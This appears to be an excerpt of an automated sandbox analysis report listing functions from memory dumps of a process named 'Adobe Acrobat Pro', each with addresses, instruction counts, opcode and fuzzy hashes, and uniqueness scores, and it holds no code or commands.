Opcode ID: 5a9c2914b8860e7d9b2a3991249068f8427ca7bbebf813f89a405e6835727b32
Instruction ID: 15baa0d5966e416fca4691bf3e60108feebf7d43537ad8267efa6dfbc07a231c
Opcode Fuzzy Hash: 5a9c2914b8860e7d9b2a3991249068f8427ca7bbebf813f89a405e6835727b32
Instruction Fuzzy Hash: 6441773551C7A54BC708EF79E4944EB73E1EFC5320F648A6EA8C6CB580E738912ADB50

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C77EB Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7176f829fd724871875aa5fc4c33147aa479e4c412ae09affc705c01ea0094d6
Instruction ID: 7ffcf4a9e4b217fb3ef67db5dc15ff33d68647b0469ec440cb1616ad1fdc88b2
Opcode Fuzzy Hash: 7176f829fd724871875aa5fc4c33147aa479e4c412ae09affc705c01ea0094d6
Instruction Fuzzy Hash: DE4104356087028FD718EF38E4815EBB3E1FFD6320F648A2E9191871E9EB309416CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A6ABA Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f00a12ff9e12a53d34d68bbb89d957def405fb500a2ee9615122472b57c91f1a
Instruction ID: 2fb19ef86503ae45d9b44d900b8141aee84129cfd3d7919bf69f046327f3728f
Opcode Fuzzy Hash: f00a12ff9e12a53d34d68bbb89d957def405fb500a2ee9615122472b57c91f1a
Instruction Fuzzy Hash: 6E41E3345086028BCB18EF28D4904EBB3E2FFD6310F549A6DC0D647695EB346566DB46

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AE607 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccdec1e926e7d7a0dab52ef7bdb8575647d4b3720bb453262d187baf120ca25
Instruction ID: 0dfef82e881b0290555f0511d0db4b566b24f320fb00e8aad13caf52c776f5f3
Opcode Fuzzy Hash: 4ccdec1e926e7d7a0dab52ef7bdb8575647d4b3720bb453262d187baf120ca25
Instruction Fuzzy Hash: A541AA3A5047524BD31DDF7880510BAB7E2EFC4210B90CA2E95DAC36C9DE39942B8B01

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BB6DF Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24b22b7a3058116b2602e79b388dfb05e38519c44fae9d0a129ea50278f6abe
Instruction ID: a41c42180457827bbf11368da7c4eb101d1023eee7e592e203c52f30e6fb8c77
Opcode Fuzzy Hash: a24b22b7a3058116b2602e79b388dfb05e38519c44fae9d0a129ea50278f6abe
Instruction Fuzzy Hash: 0A419B7500831A8FDB09DF29E4644EE77D2EFC6314F258A3ED0CA87691DA789619CB06

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B24EC Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3735d51bd8a0707a26acaa2e1ad6caf9e49cf20f659fad7f72f0ea5943860c35
Instruction ID: d61624a132e68e42e0554a8125f2a9cbb5364861dbbab8ddabe3da93b66dc138
Opcode Fuzzy Hash: 3735d51bd8a0707a26acaa2e1ad6caf9e49cf20f659fad7f72f0ea5943860c35
Instruction Fuzzy Hash: D93152361087414BCB1DEF74D4A10EAB7D1EFAA360F509A2ED1D6836D1DB79A10ACB01

Uniqueness

Uniqueness Score: -1.00%

Function 1B39DD13 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44890ad1d5242ce963bf29f47eea25183aefc1e33bb2a43776245a03349ed92d
Instruction ID: 0a20145b59f7d075dab756b37550a15614851d8fc113c62aea160ac82ab704b6
Opcode Fuzzy Hash: 44890ad1d5242ce963bf29f47eea25183aefc1e33bb2a43776245a03349ed92d
Instruction Fuzzy Hash: 38415E751187068BC714DF28E8908EAB3F2FFD5700F548A6CD485CB265EB35A916CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C645A Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9532df7521d41dc71aa4a93b1016a5be3c0c48cfaa5fafc56f56b383a7feb24f
Instruction ID: d0ea15fc3b9f41fc4e426b62d176e6a48a75770b049fbdf59e19e0712b3a5f81
Opcode Fuzzy Hash: 9532df7521d41dc71aa4a93b1016a5be3c0c48cfaa5fafc56f56b383a7feb24f
Instruction Fuzzy Hash: 7F316832209A025BD70CDF38CC808AAB3D2EFC6261BA8DB6D9491CB5DCD7756457CB44

Uniqueness

Uniqueness Score: -1.00%

Function 1CED89DE Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af5e965ebf92f163bd6f9c30db89e5702153564a531328f9d91a9b824fb090d1
Instruction ID: 42e4634de66070b0e6365e6de62c60b7af13652492b666b76f9582a02f6c73b3
Opcode Fuzzy Hash: af5e965ebf92f163bd6f9c30db89e5702153564a531328f9d91a9b824fb090d1
Instruction Fuzzy Hash: 9041313010C7569BE715AB38D4615EFBBE1EFC6324F468B6E90D1871E2E338444ADB06

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB42B4 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e23cfe2e2e4c022ff8f9e08794ab0ad9728a0e759adc993d76083b44477824e
Instruction ID: f04ea51afdba8ed3bb26cf6dce09e16acfd2c6a8ded851d721dca731bf4a01de
Opcode Fuzzy Hash: 3e23cfe2e2e4c022ff8f9e08794ab0ad9728a0e759adc993d76083b44477824e
Instruction Fuzzy Hash: BF419E36214602CFC315DF38C4808EA73E1FFC5305B528AADC0968B698DF35A119CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1D0AB157 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D0AB000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D0AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d0ab000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 203a8161155bfb7cac6bd7d15e91531163ee4d51856dff9ff1185f9c423be08c
Instruction ID: 6ad8828f2d66f1c7aee10a350a990aec8539423dceceb9c3f202b13a6e5cfe58
Opcode Fuzzy Hash: 203a8161155bfb7cac6bd7d15e91531163ee4d51856dff9ff1185f9c423be08c
Instruction Fuzzy Hash: 4131473421C70A4BC329EF74D48119BB7D1EBD5310F509A7DC4CB8B542DA34991B8B86

Uniqueness

Uniqueness Score: -1.00%

Function 1C89C093 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001C88D000.00000020.00000001.01000000.00000004.sdmp, Offset: 1C88D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1c88d000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44943ccf4513618e6799b80dd1e2df411583b2891cc4b5f2e48525ea44b2041e
Instruction ID: ef77f1cc8ec6a79d19e26419cfa0266b55741cba236289b540693648baa76479
Opcode Fuzzy Hash: 44943ccf4513618e6799b80dd1e2df411583b2891cc4b5f2e48525ea44b2041e
Instruction Fuzzy Hash: F131653560CB178BC319EF58E5809EAF3E1FBD4360F215B2DC19287581DB34614ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB7F81 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7197ced0cdd04668c739f3a513ea1dea9c00d264ee8aed9991337e3ee41e1573
Instruction ID: fe2b485be1377d8ed17571493803cffa4cf5ae793b8590f6e4fa7b5861b4a6e3
Opcode Fuzzy Hash: 7197ced0cdd04668c739f3a513ea1dea9c00d264ee8aed9991337e3ee41e1573
Instruction Fuzzy Hash: 2E317B340047668BD719DB24C4905E7B3E1FFD8314B608A6EC447CB686EB35A557CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1D0762CA Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D06A000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D06A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d06a000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f08041008264c951767e7a67ada023e0bfb0da3c62860d1bef284314af39cd0
Instruction ID: 622722536d30a7cf44e77becad0f4a02179411d9e043358b93ce9c75665ccf9f
Opcode Fuzzy Hash: 4f08041008264c951767e7a67ada023e0bfb0da3c62860d1bef284314af39cd0
Instruction Fuzzy Hash: 24315B3255CE0A8BD32DDE24C8811A6B3A7EBC1316B05C75EC4D39B099EB71A617C785

Uniqueness

Uniqueness Score: -1.00%

Function 1AD62308 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688ecbae28cb026a01f97d26af0499e89523c43714d83aada088eaa31b6cab8e
Instruction ID: bac73ac6b854aa48ba9a4646500062d05ea0e8b174fea979c206d1fbd43875c9
Opcode Fuzzy Hash: 688ecbae28cb026a01f97d26af0499e89523c43714d83aada088eaa31b6cab8e
Instruction Fuzzy Hash: 983177752083068BE308EF29E8801ABB7E2EFD5311F64CA2DD1D6CB299E671510AC742

Uniqueness

Uniqueness Score: -1.00%

Function 1CC060F8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3daee89bd935826a1946be5dc1e38adc53d1ed8222043f5ea298c6b1bb8c2e5
Instruction ID: 3655f51e57331d34cba3a9420a2b242804ae3ad2241695f6de45432273004149
Opcode Fuzzy Hash: d3daee89bd935826a1946be5dc1e38adc53d1ed8222043f5ea298c6b1bb8c2e5
Instruction Fuzzy Hash: 1331CC31500E634FC318DE38D8E20FA3392AFE2322740976EA4A2CF5D5DB68551A8359

Uniqueness

Uniqueness Score: -1.00%

Function 1AD60D2D Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ccc333da9c28adefd7c38c762a535ce067cfd1bea3cf820d2897f86adb620c4
Instruction ID: 381fd786aa92990dea455f8ffa4b3a9ec31be06f5018bac9bb93cc4f4f4d654b
Opcode Fuzzy Hash: 3ccc333da9c28adefd7c38c762a535ce067cfd1bea3cf820d2897f86adb620c4
Instruction Fuzzy Hash: 7B31DE362083128BC318EF78E5944AEB3E1FBD5324F258A7ED092C7995DB34A416CB02

Uniqueness

Uniqueness Score: -1.00%

Function 1CC0B1F8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff5bf3fc1bb8eed37b1b2738c4f989460ad6394a9f81f11c4749b56c16d211c
Instruction ID: fa92b2abe095e142b274656448e9c70e4eac80309df7b6285ca1cdbee2f7b174
Opcode Fuzzy Hash: 5ff5bf3fc1bb8eed37b1b2738c4f989460ad6394a9f81f11c4749b56c16d211c
Instruction Fuzzy Hash: 954124725287128BD318EF38D0458AAB3E1FFC1315F618A3ED096C74D5DB35601A8B52

Uniqueness

Uniqueness Score: -1.00%

Function 1AD6A036 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e2ae02fc03428e114ae90b085ca96f21d50efd7d7bad47159547d7e0c6f41d
Instruction ID: c1bd5749660887e5ff554acd85a29577a5086a920433300d9130b36c01772768
Opcode Fuzzy Hash: e4e2ae02fc03428e114ae90b085ca96f21d50efd7d7bad47159547d7e0c6f41d
Instruction Fuzzy Hash: 7031623260C7424BD319EF28D4444AAB3D2FBC5324F24CB6ED09AC7AC5DB799096CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BD7FC Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f47031660a576dca63a1b12ebc5c8b84ebbff932d2167bf34035bf17ff2201
Instruction ID: d117d6f16030b3cb1afcc071faf93859afd712b3f8e595d640d0eb9e1fcc7fd1
Opcode Fuzzy Hash: 24f47031660a576dca63a1b12ebc5c8b84ebbff932d2167bf34035bf17ff2201
Instruction Fuzzy Hash: B42189B52046168FDB1CEF74A4A20EB33D2EBC53247A0972ED453D60D5EA34501AC600

Uniqueness

Uniqueness Score: -1.00%

Function 1B39EAB8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cface5e1c347e029da84446d48b4501937be0c1fa4f7b70994d39440174e90d
Instruction ID: 31e804636cb989d8c69d8c523841a23d1c3705395f6036238c83f73edff06a1c
Opcode Fuzzy Hash: 9cface5e1c347e029da84446d48b4501937be0c1fa4f7b70994d39440174e90d
Instruction Fuzzy Hash: 3C31E531518B438BD304EF29E4854ABB391EFD9361F60CBBD919AC7198D734985ACE01

Uniqueness

Uniqueness Score: -1.00%

Function 1CA4D5EA Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f2289ae9b5235cfdba27ed5eda62a58b388af28adf8d6911e87b4afb7269b14
Instruction ID: e7ef8a56b1d212ba8fd9006ecdf4f6696c3fc405d784d38b38b9d53a549b2952
Opcode Fuzzy Hash: 1f2289ae9b5235cfdba27ed5eda62a58b388af28adf8d6911e87b4afb7269b14
Instruction Fuzzy Hash: D83178366043464BD30DEF78D8902FA7392EFD4310B55872D88828B9C8EA36A81BC790

Uniqueness

Uniqueness Score: -1.00%

Function 1CCA112C Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed76a82ff82dcb0a522e32751e53f0fae5970cc49ea03ed59f9fc8090a0849e
Instruction ID: 14a1d44777953053182fa47a13f2b74e6add171b0c6a730145c8e2823486e444
Opcode Fuzzy Hash: 0ed76a82ff82dcb0a522e32751e53f0fae5970cc49ea03ed59f9fc8090a0849e
Instruction Fuzzy Hash: DE315835141A674BC319CA28C8A05EB7791FF82320BA4AB9E85D2471DAEB756427CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B22AD Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47fe08873727ff7c915fd6f721d0d89e0847651646426b503236262d89b8c4fb
Instruction ID: 9bc50692ddd89dd5185f6c6686f4c534da4133f0b7a37e6ad1172ceb0b965f53
Opcode Fuzzy Hash: 47fe08873727ff7c915fd6f721d0d89e0847651646426b503236262d89b8c4fb
Instruction Fuzzy Hash: 41214819428B9203DB05E73C99901EBA782DFC6234F94675C94E2C34F2DB2B541ED709

Uniqueness

Uniqueness Score: -1.00%

Function 1CC086CD Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d775b03afdbc384fe958f30bcc7bb9db62e87ad6b9ff3273caac80354d6ec9f5
Instruction ID: f9313a10df7ac6a17918f3de70ac9727ee47d5201d7e62a2e01d58805b5fbbda
Opcode Fuzzy Hash: d775b03afdbc384fe958f30bcc7bb9db62e87ad6b9ff3273caac80354d6ec9f5
Instruction Fuzzy Hash: 7E2142724006118BE30A8E3DC4A84E73BD1EFC2318B60976EA416CB6D5EB25940ED745

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BC62F Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb5965050ab2dab9a416b88353000ad7125206b115044c89b49cb3e0ce84f10
Instruction ID: c9647e9e2e8a099be15bd1ef9794befdc6a8e18cb6b8c9ed4c73498f4d44eef9
Opcode Fuzzy Hash: 4bb5965050ab2dab9a416b88353000ad7125206b115044c89b49cb3e0ce84f10
Instruction Fuzzy Hash: 4B31C03211C7268FE718DB6CF5504AAB7E0EBC6324F748B3EC4A5C75E5EA76601A8604

Uniqueness

Uniqueness Score: -1.00%

Function 1B394B9F Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8381d0000adee9db89d441d38f36197988bc8c66e82e72fc7d1f324850f672c
Instruction ID: a7e935e64d567cb2ef695fe0241c47440e9ef8ab1410bbcc33cab12afb58d833
Opcode Fuzzy Hash: a8381d0000adee9db89d441d38f36197988bc8c66e82e72fc7d1f324850f672c
Instruction Fuzzy Hash: 4A216B792046064FEB1CEF75E5E24F73392EBD4324BA0973E9483D71D6EE65501AC600

Uniqueness

Uniqueness Score: -1.00%

Function 1CB06C36 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CB06000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CB06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cb06000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54f8a7701a8c7505cdd74f5f1551795fad7c1bb546f413e2ee1218970b577d14
Instruction ID: f950f34ea9f1d16545c4f54ac7bd54e924d88401845c4e934e26be4240c776fa
Opcode Fuzzy Hash: 54f8a7701a8c7505cdd74f5f1551795fad7c1bb546f413e2ee1218970b577d14
Instruction Fuzzy Hash: 8A4104361183478BC714DF35E4908EAB7E2FFD6340F25CA2DC4968BA64EA746219CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBD88D Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d3a477a24a12fa2255f2eda0abf1a2383807cd00fec909ef337535aff1cadcb
Instruction ID: bea46c8100ed2aa629562aae1990e4ce8ac607408559e9325deb865df3a55d3b
Opcode Fuzzy Hash: 1d3a477a24a12fa2255f2eda0abf1a2383807cd00fec909ef337535aff1cadcb
Instruction Fuzzy Hash: 0B31243660C7438BD329EB28E48146AB3E1EFC5315FA54F7FC092835C6CB25A129CA85

Uniqueness

Uniqueness Score: -1.00%

Function 1CCA1EC8 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4962d1e34e8c2224f19c90cd176996e5b9c8ea58f4cfd30bff47d278a72fb88a
Instruction ID: 998efe7a21238069ab00819271a3e4482db1dd5b54dbcd8ff9c361ca4398b837
Opcode Fuzzy Hash: 4962d1e34e8c2224f19c90cd176996e5b9c8ea58f4cfd30bff47d278a72fb88a
Instruction Fuzzy Hash: 593139356487028BD308EB28D8518ABB3E6EFC1330B24DB7D90B6875E4EB385056CB05

Uniqueness

Uniqueness Score: -1.00%

Function 1ADD791A Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADD7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1add7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fce0fc9828040ed3cc3ab71a76e17bcf09f1a1aaaa66e41552e09835db8f4d8
Instruction ID: 8c52ba58fb992834d25f73741ad4a52555a94fc701bf7e1b47a8d9456e59badb
Opcode Fuzzy Hash: 9fce0fc9828040ed3cc3ab71a76e17bcf09f1a1aaaa66e41552e09835db8f4d8
Instruction Fuzzy Hash: 9A3159396082028FD718DF74D4914EBB7E2FBC6300F58E66ED4858764AD3359507EB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BFA1F Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09decd0390540018af8e106a4c7ae2bd69541c9309d2540313e071ed9494bc3a
Instruction ID: c4aa473f17ac9be6a7be32a98d7143bb0532797f274c0c6567fa724c6d8f6a15
Opcode Fuzzy Hash: 09decd0390540018af8e106a4c7ae2bd69541c9309d2540313e071ed9494bc3a
Instruction Fuzzy Hash: 7F2109752186124BD31DDE3CC9914A777E2EBCA320B58CB7EC4E3C71D8EA38A45AC601

Uniqueness

Uniqueness Score: -1.00%

Function 1CB06957 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CB06000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CB06000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cb06000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a32f93a0d0d95e0bc3aa30c2aa7482954479d8c63f7f1adb19c852efdebf0bb
Instruction ID: 1ef77260b951e3929a49a6fd12b2932e99370a97c0eb918e58a903891506f43c
Opcode Fuzzy Hash: 2a32f93a0d0d95e0bc3aa30c2aa7482954479d8c63f7f1adb19c852efdebf0bb
Instruction Fuzzy Hash: A131307661C3428BD309EF68E0800AAB7D2FBC9305F22C93CC8C987640DB39A016CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1CC99707 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2195a069dbc6d39f7dba60b76615007e67444c735092ae48c4565bd8d360f90e
Instruction ID: 95ef09ff71e38a4e25183bf4fe9f6f8b92a5dc7925e45619e41a8c03e04359af
Opcode Fuzzy Hash: 2195a069dbc6d39f7dba60b76615007e67444c735092ae48c4565bd8d360f90e
Instruction Fuzzy Hash: BA31E1394087828BD301EF2994504BEBBE2FFC9321F618A6DC5D1C75A9E735542ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B2814 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3acf73700cd6a0987bd12f56d836747391076610677e504da2b4cebc6a1dd59a
Instruction ID: 27248757bc2ccc15f39b73476a150b26242ff99a530cbb17963c8d0ff7601ded
Opcode Fuzzy Hash: 3acf73700cd6a0987bd12f56d836747391076610677e504da2b4cebc6a1dd59a
Instruction Fuzzy Hash: 0F3166311086A38BCB18CF29E4504EB77E2EFC9304F54D57DD88A87686E2389547CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1B393CE9 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

